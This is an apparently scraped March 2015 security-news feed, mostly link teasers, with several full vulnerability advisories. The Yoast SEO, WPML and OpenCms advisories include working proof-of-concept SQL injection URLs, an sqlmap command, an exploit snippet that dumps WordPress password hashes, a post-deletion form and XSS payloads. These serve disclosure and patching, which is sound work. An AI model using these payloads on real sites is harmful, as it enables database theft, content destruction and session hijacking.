Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

WordPress SEO by Yoast

March 12, 2015, 1:35 pm
$
0
0
Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection
Version/s Tested: 1.7.3.3
Patched Version: 1.7.4
CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
WPVULNDB: https://wpvulndb.com/vulnerabilities/7841

Description:

WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used
to improve the Search Engine Optimization (SEO) of WordPress sites. The
latest version at the time of writing (1.7.3.3) has been found to be
affected by two authenticated (admin, editor or author user) Blind SQL
Injection vulnerabilities. The plugin has more than one million downloads
according to WordPress.

Technical Description:

The authenticated Blind SQL Injection vulnerability can be found within the
'admin/class-bulk-editor-list-table.php' file. The orderby and order GET
parameters are not sufficiently sanitised before being used within a SQL
query.

Line 529:

$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field(
$_GET['orderby'] ) ) : 'post_title';

Line 533:

order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );

If the GET orderby parameter value is not empty it will pass its value
through WordPess's own esc_sql() function. According to WordPress this
function 'Prepares a string for use as an SQL query. A glorified
addslashes() that works with arrays.'. However, this is not sufficient to
prevent SQL Injection as can be seen from our Proof of Concept.

Proof of Concept (PoC):

The following GET request will cause the SQL query to execute and sleep for
10 seconds if clicked on as an authenticated admin, editor or author user.

http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc

Using SQLMap:

python sqlmap.py -u "
http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc"
--batch --technique=B --dbms=MySQL --cookie="wordpress_9d...;
wordpress_logged_in_9dee67...;"

Impact:

As there is no anti-CSRF protection a remote unauthenticated attacker could
use this vulnerability to execute arbitrary SQL queries on the victim
WordPress web site by enticing an authenticated admin, editor or author
user to click on a specially crafted link or visit a page they control.

One possible attack scenario would be an attacker adding their own
administrative user to the target WordPress site, allowing them to
compromise the entire web site.

Timeline:

March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst
(WPScan Team - Dewhurst Security).
March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team).
March 10th 2015 - 20:00 GMT: Vendor contacted via email.
March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave
expected patch timeline.
March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches
this issue.
March 11th 2015 - 12:30 GMT: Advisory released.
Search

Foreign LINUX

March 12, 2015, 1:37 pm
$
0
0
Foreign LINUX is a dynamic binary translator and a Linux system call interface emulator for the Windows platform. It is capable of running unmodified Linux binaries on Windows without any drivers or modifications to the system. This provides another way of running Linux applications under Windows in constrast to Cygwin and other tools.

more here..........https://github.com/wishstudio/flinux

Security Issue: Combining Bcrypt With Other Hash Functions

March 12, 2015, 1:38 pm
$
0
0
The other day, I was directed at an interesting question on StackOverflow asking if password_verify() was safe againt DoS attacks using extremely long passwords. Many hashing algorithms depend on the amount of data fed into them, which affects their runtime. This can lead to a DoS attack where an attacker can provide an exceedingly long password and tie up computer resources. It's a really good question to ask of Bcrypt (and password_hash). As you may know, Bcrypt is limited to 72 character passwords. So on the surface it looks like it shouldn't be vulnerable. But I chose to dig in further to be sure. What I found surprised me.

more here........http://blog.ircmaxell.com/2015/03/security-issue-combining-bcrypt-with.html

WPML WordPress plug-in SQL injection etc.

March 12, 2015, 1:39 pm
$
0
0
*OVERVIEW*

WPML is the industry standard for creating multi-lingual WordPress sites.
Three vulnerabilities were found in the plug-in. The most serious of them,
an SQL injection problem, allows anyone to read the contents of the
WordPress database, including user details and password hashes, without
authentication.

System administrators should update to version 3.1.9.1 released earlier
this week to resolve the issues.



*DETAILS*

*1. SQL injection*
When WPML processed a HTTP POST request containing the parameter
”action=wp-link-ajax”, the current language is determined by parsing the
HTTP referer. The parsed language code is not checked for validity, nor
SQL-escaped. The user doesn’t need to be logged in.

By sending a carefully crafted referer value with the mentioned POST
request parameter, an attacker can perform SQL queries on arbitrary tables
and retrieve their results. In addition to the standard WordPress database
and tables, the attacker may query all other databases and tables
accessible to the web backend.

The following HTML snippet demonstrates the vulnerability:

<script>var union="select
user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from
wp_users";if (document.location.search.length < 2)
        document.location.search="lang=xx' UNION "+union+" -- -- ";</script>
<form method=POST
action="https://YOUR.WORDPRESS.BLOG/comments/feed"><input type=hidden
name=action value="wp-link-ajax"><input type=submit></form>

The results of the SQL query will be shown in the comments feed
XML-formatted.


*2. Page/post/menu deletion*

WPML contains a ”menu sync” function which helps site administrators to
keep WordPress menus consistent across different languages. This
functionality lacked any access control, allowing anyone to delete
practically all content of the website - posts, pages, and menus.
Example:

<form method=POST
action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php"><input
type=hidden name="action" value="icl_msync_confirm"><input type=text
name="sync" size=50 value="del[x][y][12345]=z"><input
type=submit></form>

Submitting the above form would delete the row with the ID 12345 in the
wp_posts database. Several items be deleted with the same request.



*3. Reflected XSS*

The ”reminder popup” code intended for administrators in WPML didn’t check
for login status or nonce. An attacker can direct target users to an URL
like:

https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f


to execute JavaScript in their browser. This example bypasses the Chrome
XSS Auditor.
In the case of WordPress, XSS triggered by an administrator can lead to
server-side compromise via the plugin and theme editors.



*CREDITS*

The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while
researching WordPress plugins falling in the scope of the Facebook bug
bounty program.

The vendor was notified on March 02, 2015 and the patch was released on
March 10.

Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/

An up-to-date version of this document can be found on our website
http://klikki.fi .

Integer Overflow Prevention in C

March 12, 2015, 3:11 pm
$
0
0
Integer overflows are known bugs in C which can lead to exploitable vulnerabilities.
more here......https://splone.com/blog/2015/3/11/integer-overflow-prevention-in-c

Alkacon OpenCms 9.5.1 Multiple XSS Vulnerabilities

March 12, 2015, 3:47 pm
$
0
0
Product: OpenCms
Vendor: Alkacon Software
Vulnerable Version(s): 9.5.1 and probably prior
Tested Version: 9.5.1
Vendor Notification: Mar 05, 2015 (https://github.com/alkacon/opencms-core/issues/304)
Vendor Patch: Not Yet (No Specific Time-line)
Public Disclosure: Mar 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Not Yet (https://github.com/alkacon/opencms-core/)
Discovered and Credits: Rehan Ahmed (knight_rehan@hotmail.com)

_______________________________________________________________________________________________________________________
Overview
_______________________________________________________________________________________________________________________

Alkacon OpenCms 9.5.1 or prior versions are prone to a multiple cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
_______________________________________________________________________________________________________________________
Vendor's Description of Application
_______________________________________________________________________________________________________________________

OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently.
The fully browser based user interface features configurable editors for structured content with well defined fields. Alternatively, content can be created using an integrated WYSIWYG editor similar to well known office applications. A sophisticated template engine enforces a site-wide corporate layout and W3C standard compliance for all content.
OpenCms is based on Java and XML technology. It can be deployed in an open source environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial components (e.g.  Windows NT, IIS, BEA Weblogic, Oracle).
As true open source software, OpenCms is free of licensing costs.

http://www.opencms.org/en/index.html
_______________________________________________________________________________________________________________________
Vulnerability Details & Exploit
_______________________________________________________________________________________________________________________

Method: GET

/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink="+onmouseover="javascript:confirm(0);">Click HERE<!--
/opencms/system/workplace/locales/en/help/index.html?buildframe=true&workplaceresource="+onmouseover=confirm(0)//
/opencms/system/workplace/views/admin/admin-main.jsp?root=explorer&menu=no&path=%2Fpublishqueue';</script><script>confirm(0)</script>
/opencms/system/workplace/views/explorer/explorer_files.jsp?mode=explorerview";</script><script>confirm(0)</script>

Method: POST

POST /opencms/system/modules/org.opencms.workplace.help/elements/search.jsp?__locale=en HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://127.0.0.1:8080/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink=null&workplaceresource=&buildframe=true
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Length: 104

action=search&query=<iframe src=javascript:confirm(0);&index=German+online+help&searchPage=1&query2=1234

_______________________________________________________________________________________________________________________

Achievement Locked: New Crypto-Ransomware Pwns Video Gamers

March 12, 2015, 4:23 pm
$
0
0
Gamers may be used to paying to unlock downloadable content in their favorite games, but a new crypto-ransomware variant aims to make gamers pay to unlock what they already own. Data files for more than 20 games can be affected by the threat, increasing what is already a large target for cybercriminals. Another file type that hasn’t been targeted before is iTunes related. But first, let’s have a look at the initial infection here.........http://labs.bromium.com/2015/03/12/achievement-locked-new-crypto-ransomware-pwns-video-gamers/

Talos Discovery Spotlight: Hundreds of Thousands of Google Apps Domains’ Private WHOIS Information Disclosed

March 13, 2015, 12:21 am
$
0
0
In mid-2013, a problem occurred that slowly began unmasking the hidden registration information for owners’ domains that had opted into WHOIS privacy protection. These domains all appear to be registered via Google App [1], using eNom as a registrar. At the time of writing this blog, there are 305,925 domains registered via Google’s partnership with eNom. 282,867 domains, or roughly 94% appear have been affected [2]. (Google reports that new domains which have not faced a renewal period are not affected and many businesses do not opt into their privacy service.) The information disclosed included full names, addresses, phone numbers, and email addresses for each domain. The information was leaked in the form of WHOIS records.

more here..........http://blogs.cisco.com/security/talos/whoisdisclosure
Search

Introducing Masche: memory scanning for server security

March 13, 2015, 12:34 am
$
0
0
Mozilla operates thousands of servers to build products and run services for our users. Keeping these servers secure is the primary concern of the Operations Security team, and the reason why we have built Mozilla InvestiGator (MIG), a cross-platform endpoint security system.

MIG can inspect the file system and network information of thousands of hosts in parallel, which greatly helps increase visibility across the infrastructure. But until recently, it lacked the ability to look into the memory of running processes, a need that often arises during security investigations.

This is where Mozilla Winter of Security team Masche (Memory Analysis Suite for Checking the Harmony of Endpoints) comes into play.

more here........https://blog.mozilla.org/security/2015/03/12/introducing-masche-memory-scanning-for-server-security/

VIRLOCK Combines File Infection and Locks Computer Screens

March 13, 2015, 4:20 am
$
0
0
Ransomware has become one of the biggest problems for end users are as of late. In the past months alone, we have reported on several variants of both ransomware and crypto-ransomware, each with their own “unique” routines. We recently came across one malware family, detected as PE_VIRLOCK, as that not only locks the computer screen but also infects files—a first for ransomware.

more here.........http://blog.trendmicro.com/trendlabs-security-intelligence/virlock-combines-file-infection-and-ransomware/

Rooting the Transcend WiFi SD card

March 13, 2015, 4:23 am
$
0
0
by injecting commands into the wifi channel config

This exploit requires opening the "Files" page of the card's web interface and escaping to the root of the file system.

more here..........https://gist.github.com/deckar01/6d9b76bdef21eaab0568

Monitoring High-Risk Users with StealthWatch Dashboards

March 13, 2015, 9:55 am
$
0
0
Most businesses trust their own employees, but when an organization deals with sensitive data, security must come first. In such an environment, a worker who has turned in their two weeks’ notice or displayed suspicious behavior may warrant a little extra scrutiny, and not without reason.

more here.........http://www.lancope.com/blog/monitoring-high-risk-users-stealthwatch-dashboards

Bypassing ASLR with CVE-2015-0071: An Out-of-Bounds Read Vulnerability

March 13, 2015, 9:56 am
$
0
0
Almost every Patch Tuesday cycle contains one bulletin that (for convenience) rolls up multiple Internet Explorer vulnerabilities into a single bulletin. February’s Patch Tuesday cumulative IE bulletin (MS15-009) included a fix for a particularly interesting vulnerability that could be used to bypass one of the key anti-exploit technologies in use today, address space layout randomization (ASLR).

This vulnerability was designated CVE-2015-0071. To be used in an attack, this vulnerability must be combined with another one that is capable of actually running code on the affected machines. In attacks seen by iSIGHT, this has been paired with an Adobe Flash vulnerability (CVE-2014-9163), which was fixed in December.

This vulnerability was found in the jscript9.dll module. To analyze this vulnerability, I examined this file (version 9.0.8112.1645) on a Windows 7, 32-bit system here........http://blog.trendmicro.com/trendlabs-security-intelligence/bypassing-aslr-with-cve-2015-0071-an-out-of-bounds-read-vulnerability/

Samsung's Android SNS Exploit

March 13, 2015, 9:58 am
$
0
0
Proof of concept of vulnerabilities in Samsung's SNS application here.......https://github.com/programa-stic/SNS-thief

Diaphora, a program diffing plugin for IDA Pro

March 13, 2015, 10:00 am
$
0
0
Some weeks ago I started developing a binary diffing plugin for IDA Pro (in IDA Python) like Zynamics BinDiff, DarunGrim or Turbo Diff. The reasons to create one more (open source) plugin for such task are various, but the following are the main ones here..........http://joxeankoret.com/blog/2015/03/13/diaphora-a-program-diffing-plugin-for-ida-pro/
Search

Beyond good ol’ Run key, Part 29

March 13, 2015, 10:01 am
$
0
0
LNK files are used by malware for many years so there is not much new about it that can be said with regards to persistence.

Examples include:

Placing shortcut files in popular locations (Desktop, Start Menu)
Replacing an .exe path inside the .lnk files with one pointing to a malicious executable (‘man-in-the-middle’, or a variant of a companion virus)
Exploits (as used by Stuxnet)
Etc.
The following examples explore 2 more (but less popular) methods of leveraging LNK files as a persistence mechanism here........http://www.hexacorn.com/blog/2015/03/13/beyond-good-ol-run-key-part-29/

Jamieoliver[dot]com still compromised, now drops digitally signed malware

March 13, 2015, 10:02 am
$
0
0
Almost one month ago we blogged about popular Chef Jamie Oliver having his website hacked and serving malware.

The issue was quickly resolved following our disclosure and Jamie Oliver’s management team issued a public statement:

"The team at jamieoliver.com found a low-level malware problem and dealt with it quickly. The site is now safe to use. We have had only a handful of comments from users over the last couple of days, and no-one has reported any serious issues. We apologise to anyone who was at all worried after going on the site. The Jamie Oliver website is regularly checked for vulnerabilities by both our in-house team and an independent third-party and they quickly deal with anything that is found. The team is confident that no data has been compromised in this incident but if anyone is worried, do please use the contact form on the site."

Sadly, it appears as though the problem has returned, or perhaps was not completely dealt with.

more here......https://blog.malwarebytes.org/exploits-2/2015/03/jamieoliver-com-still-compromised-now-drops-digitally-signed-malware/

107 The Need for Pro active Defense and Threat Hunting Within Organizations Andrew Case

March 13, 2015, 10:07 am
$
0
0
The video for the presentation is here https://www.youtube.com/watch?v=751bkSD2Nn8&t=1m35s and the slides are here.....http://www.slideshare.net/AndrewDFIR/my-keynote-from-bsidestampa-2015-video-in-description

T-Pot: A Multi-Honeypot Platform

March 13, 2015, 10:10 am
$
0
0
We created a honeypot platform, which is based on the well-established honeypots glastopf, kippo, honeytrap and dionaea, the network IDS/IPS suricata, elasticsearch-logstash-kibana, ewsposter and some docker magic. We want to make this technology available to everyone who is interested and release it as a Community Edition. We want to encourage you to participate.

more here........http://dtag-dev-sec.github.io/mediator/feature/2015/03/11/concept.html


and here........https://github.com/dtag-dev-sec/tpotce

Tango- Honeypot Intelligence with Splunk

March 13, 2015, 11:43 am
$
0
0
Tango is a set of scripts and Splunk apps which help organizations and users quickly and easily deploy honeypots and then view the data and analysis of the attacker sessions. There are two scripts provided which facilitate the installation of the honeypots and/or Splunk Universal Forwarder. One of the scripts uf_only.sh will install the Splunk Universal Forwarder and install the necessary input and output configuration files. The other script sensor.sh will install the Splunk Universal Forwarder along with the Kippo honeypot required for the Tango Honeypot Intelligence app to work.

more here.............https://github.com/aplura/Tango
Viewing all 8064 articles
Browse latest View live
Search